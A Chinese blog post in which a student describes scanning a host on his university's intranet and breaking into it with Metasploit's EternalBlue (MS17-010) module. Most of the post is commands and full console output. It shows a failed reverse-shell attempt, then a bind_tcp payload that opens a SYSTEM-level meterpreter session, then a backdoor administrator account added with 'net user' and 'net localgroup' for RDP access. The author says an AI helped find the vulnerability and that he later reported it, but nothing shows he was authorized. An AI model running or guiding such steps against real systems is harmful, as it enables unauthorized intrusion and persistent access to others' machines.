你NUIST内网居然还有可被利用的永恒之蓝漏洞...
起因
在明德楼上程序设计课摸鱼的时候,右下角360给我弹了两次暴力破解的提示
内心OS:172.16网段?不是Clash(198), 不是Zerotier(192), 我今天也没开虚拟机...莫不是学校内网的?
于是,拿手机termux扫了一下(嗯对大概是电脑上没有nmap环境)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
27000/tcp open flexlm0
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown第一眼:woc这么多端口开着
445?3389?
445我不会用啊,先上3389看看吧(想试试弱口令来着)
意外发现!Windows 7嘛,hmmmmmmmmmmm...似乎有个永恒之蓝的来着(乐
那我就不客气啦
询问AI
我:AIAI,这些端口有没有可以被利用的漏洞呀?(bushi)
好消息是,的确有永恒之蓝;
坏消息是,我真的不会用。
经过一番搜(鞭)寻(策)资(A)料(I),找到了一个好用的工具———— Metasploit 
Metasploit 是一个专业的渗透测试平台,它将漏洞利用(Exploits)和攻击载荷(Payloads)模块化。
说人话,就是把各种漏洞的探测、利用(包括构造payload及后续操作),通过各种模块化插件一股脑打包起来,以一个Flexible的框架型工具给攻防者使用
且兼容Windows和Linux,非常方便(我选用了Linux)
初探Metasploit
安装:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall初始化msfconsole
(3.13.7) root@debian12:~# msfconsole
Metasploit tip: Add routes to pivot through a compromised host using route
add <subnet> <session_id>
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v6.4.97-dev- ]
+ -- --=[ 2,569 exploits - 1,316 auxiliary - 1,680 payloads ]
+ -- --=[ 432 post - 49 encoders - 13 nops - 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
The Metasploit Framework is a Rapid7 Open Source Project看到这个界面,就可以愉快地和CVE玩耍了(x
永恒之蓝的代号是MS17-010,通过metasploit的search功能,可以找到具体可用的module
msf > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 \_ target: Automatic Target . . . .
2 \_ target: Windows 7 . . . .
...(略)
Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'看见Windows 7,我的内心又变得愉悦了几分。exploit/windows/smb/ms17_010_eternalblue这个Module,可以很方便地使用
第一次尝试
键入命令 use exploit/windows/smb/ms17_010_eternalblue使用该模块
得到 [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp (后面要考!)
再键入show options,就能很方便地看见这个Module的利用方法
msf exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embed
ded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded
Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7
target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.11 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.hmmmm...看上去是配置一下远程ip就可以一键exploit了!
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 172.16.55.5
RHOSTS => 172.16.55.5
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.11:4444
[*] 172.16.55.5:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.55.5:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[!] 172.16.55.5:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x4DD9B4E4
[*] 172.16.55.5:445 - Scanned 1 of 1 hosts (100% complete)
[+] 172.16.55.5:445 - The target is vulnerable.
[*] 172.16.55.5:445 - Connecting to target for exploitation.
[+] 172.16.55.5:445 - Connection established for exploitation.
[+] 172.16.55.5:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.55.5:445 - CORE raw buffer dump (38 bytes)
[*] 172.16.55.5:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 172.16.55.5:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 172.16.55.5:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 172.16.55.5:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.55.5:445 - Trying exploit with 12 Groom Allocations.
[*] 172.16.55.5:445 - Sending all but last fragment of exploit packet
[*] 172.16.55.5:445 - Starting non-paged pool grooming
[+] 172.16.55.5:445 - Sending SMBv2 buffers
[+] 172.16.55.5:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.55.5:445 - Sending final SMBv2 buffers.
[*] 172.16.55.5:445 - Sending last fragment of exploit packet!
[*] 172.16.55.5:445 - Receiving response from exploit packet
[+] 172.16.55.5:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.55.5:445 - Sending egg to corrupted connection.
[*] 172.16.55.5:445 - Triggering free of corrupted buffer.
[-] 172.16.55.5:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.55.5:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.55.5:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 172.16.55.5:445 - Connecting to target for exploitation.
[+] 172.16.55.5:445 - Connection established for exploitation.
[+] 172.16.55.5:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.55.5:445 - CORE raw buffer dump (38 bytes)
[*] 172.16.55.5:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 172.16.55.5:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 172.16.55.5:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 172.16.55.5:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.55.5:445 - Trying exploit with 17 Groom Allocations.
[*] 172.16.55.5:445 - Sending all but last fragment of exploit packet
[*] 172.16.55.5:445 - Starting non-paged pool grooming
[+] 172.16.55.5:445 - Sending SMBv2 buffers
[+] 172.16.55.5:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.55.5:445 - Sending final SMBv2 buffers.
[*] 172.16.55.5:445 - Sending last fragment of exploit packet!
[*] 172.16.55.5:445 - Receiving response from exploit packet
[+] 172.16.55.5:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.55.5:445 - Sending egg to corrupted connection.
[*] 172.16.55.5:445 - Triggering free of corrupted buffer.
^C[-] 172.16.55.5:445 - Exploit failed [user-interrupt]: Interrupt
[-] exploit: Interrupted看日志,应该是可以正常利用,但是为什么没有反应?卡在这好久
再细看,一行[*] Started reverse TCP handler on 192.168.1.11:4444 瞩目
看上去是反弹shell,但我用的是虚拟机呀...还隔着一层路由器,这可如何是好...
第二次尝试
欸,设置个端口转发,不就行了?
msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.11.70.10
LHOST => 10.11.70.10
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[-] Handler failed to bind to 10.11.70.10:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] 172.16.55.5:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 172.16.55.5:445 - Rex::ConnectionTimeout: The connection with (172.16.55.5:445) timed out.
[*] 172.16.55.5:445 - Scanned 1 of 1 hosts (100% complete)
[-] 172.16.55.5:445 - The target is not vulnerable.
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[-] Handler failed to bind to 10.11.70.10:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] 172.16.55.5:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
^C[*] 172.16.55.5:445 - Caught interrupt from the console...
[-] 172.16.55.5:445 - The target is not vulnerable.
^C[*] Exploit completed, but no session was created.怎么还是不行???我端口转发都配置好了啊...
会不会是学校防火墙策略的影响?
p.s. 其实后来发现是我路由器没允许入站,我还以为是学校路由器禁了我的入站
第三次尝试(事不过三!)
经过一番搜寻,我发现这玩意可以设置成主动模式(即,靶机监听端口,我来连接)
还记得我上面标的吗?
msf > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp执行一句 set PAYLOAD windows/x64/meterpreter/bind_tcp ,就变成让远端主机监听端口了~
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 172.16.55.5
RHOSTS => 172.16.55.5
msf exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444
msf exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] 172.16.55.5:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.55.5:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.55.5:445 - Scanned 1 of 1 hosts (100% complete)
[+] 172.16.55.5:445 - The target is vulnerable.
[*] 172.16.55.5:445 - Connecting to target for exploitation.
[+] 172.16.55.5:445 - Connection established for exploitation.
[+] 172.16.55.5:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.55.5:445 - CORE raw buffer dump (38 bytes)
[*] 172.16.55.5:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 172.16.55.5:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 172.16.55.5:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 172.16.55.5:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.55.5:445 - Trying exploit with 12 Groom Allocations.
[*] 172.16.55.5:445 - Sending all but last fragment of exploit packet
[*] 172.16.55.5:445 - Starting non-paged pool grooming
[+] 172.16.55.5:445 - Sending SMBv2 buffers
[+] 172.16.55.5:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.55.5:445 - Sending final SMBv2 buffers.
[*] 172.16.55.5:445 - Sending last fragment of exploit packet!
[*] 172.16.55.5:445 - Receiving response from exploit packet
[+] 172.16.55.5:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.55.5:445 - Sending egg to corrupted connection.
[*] 172.16.55.5:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 172.16.55.5:4444
[-] 172.16.55.5:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.55.5:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.55.5:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 172.16.55.5:445 - Connecting to target for exploitation.
[+] 172.16.55.5:445 - Connection established for exploitation.
[+] 172.16.55.5:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.55.5:445 - CORE raw buffer dump (38 bytes)
[*] 172.16.55.5:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 172.16.55.5:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 172.16.55.5:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 172.16.55.5:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.55.5:445 - Trying exploit with 17 Groom Allocations.
[*] 172.16.55.5:445 - Sending all but last fragment of exploit packet
[*] 172.16.55.5:445 - Starting non-paged pool grooming
[+] 172.16.55.5:445 - Sending SMBv2 buffers
[+] 172.16.55.5:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.55.5:445 - Sending final SMBv2 buffers.
[*] 172.16.55.5:445 - Sending last fragment of exploit packet!
[*] 172.16.55.5:445 - Receiving response from exploit packet
[+] 172.16.55.5:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.55.5:445 - Sending egg to corrupted connection.
[*] 172.16.55.5:445 - Triggering free of corrupted buffer.
[*] Sending stage (230982 bytes) to 172.16.55.5
[*] Meterpreter session 1 opened (192.168.1.11:38257 -> 172.16.55.5:4444) at 2025-11-05 12:44:58 +0800
[+] 172.16.55.5:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.55.5:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.55.5:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >meterpreter出来了!大胜利😋
然后就是getshell、添加用户一条龙,成功进入rdp~
meterpreter > shell
Process 11748 created.
Channel 1 created.
Microsoft Windows [ 汾 6.1.7601]
Ȩ (c) 2009 Microsoft Corporation Ȩ
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>ipconfig
ipconfig
Windows IP
̫ 2:
ض DNS . . . . . . . :
IPv6 ַ. . . . . . . . : fe80::909f:b6e0:88d3:237f%13
IPv4 ַ . . . . . . . . . . . . : 172.16.55.5
. . . . . . . . . . . . : 255.255.255.0
Ĭ . . . . . . . . . . . . . : 172.16.55.1
isatap.{2C927202-F205-48DD-84FD-763619F472B4}:
ý ״̬ . . . . . . . . . . . . : ý ѶϿ
ض DNS . . . . . . . :
C:\Windows\system32>sysinfo
sysinfo
'sysinfo' ڲ ⲿ Ҳ ǿ еij
ļ
C:\Windows\system32>exit
exit
meterpreter > sysinfo
Computer : VPC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > shell
Process 12332 created.
Channel 2 created.
Microsoft Windows [ 汾 6.1.7601]
Ȩ (c) 2009 Microsoft Corporation Ȩ
C:\Windows\system32>wmic CPU
wmic CPU
AddressWidth Architecture Availability Caption ConfigManagerErrorCode ConfigManagerUserConfig CpuStatus CreationClassName CurrentClockSpeed CurrentVoltage DataWidth Description DeviceID ErrorCleared ErrorDescription ExtClock Family InstallDate L2CacheSize L2CacheSpeed L3CacheSize L3CacheSpeed LastErrorCode Level LoadPercentage Manufacturer MaxClockSpeed Name NumberOfCores NumberOfLogicalProcessors OtherFamilyDescription PNPDeviceID PowerManagementCapabilities PowerManagementSupported ProcessorId ProcessorType Revision Role SocketDesignation Status StatusInfo Stepping SystemCreationClassName SystemName UniqueId UpgradeMethod Version VoltageCaps
64 9 3 Intel64 Family 6 Model 79 Stepping 1 1 Win32_Processor 1700 64 Intel64 Family 6 Model 79 Stepping 1 CPU0 1 0 0 6 11 GenuineIntel 1700 Intel(R) Xeon(R) CPU E5-2609 v4 @ 1.70GHz 4 4 FALSE 0F8BFBFF000406F1 3 20225 CPU CPU 0 OK 3 Win32_ComputerSystem VPC 1 0
64 9 3 Intel64 Family 6 Model 79 Stepping 1 1 Win32_Processor 1700 64 Intel64 Family 6 Model 79 Stepping 1 CPU1 1 0 0 6 0 GenuineIntel 1700 Intel(R) Xeon(R) CPU E5-2609 v4 @ 1.70GHz 4 4 FALSE 0F8BFBFF000406F1 3 20225 CPU CPU 1 OK 3 Win32_ComputerSystem VPC 1 0
C:\Windows\system32>dxfiag
dxfiag
'dxfiag' ڲ ⲿ Ҳ ǿ еij
ļ
C:\Windows\system32>net user test123 test123456 /add
net user test123 test123456 /add
ɹ ɡ
C:\Windows\system32>net localgroup Administrators test123 /add
net localgroup Administrators test123 /add
ɹ ɡ
上面没什么好看的,而且因为编码问题全是乱码...
结语
hmmmmm没想到第一次利用漏洞居然是在学校内网,而且你信还有在用Win7、没有装任何安全软件、防火墙端口全开(所以第三次尝试才能成功)的服务器,真是令人大开眼界
服务器D盘有个MATLAB,不知道这机子是用来干什么的,没去细看
相关漏洞也上报给了学校,不知道会不会修...
最新回复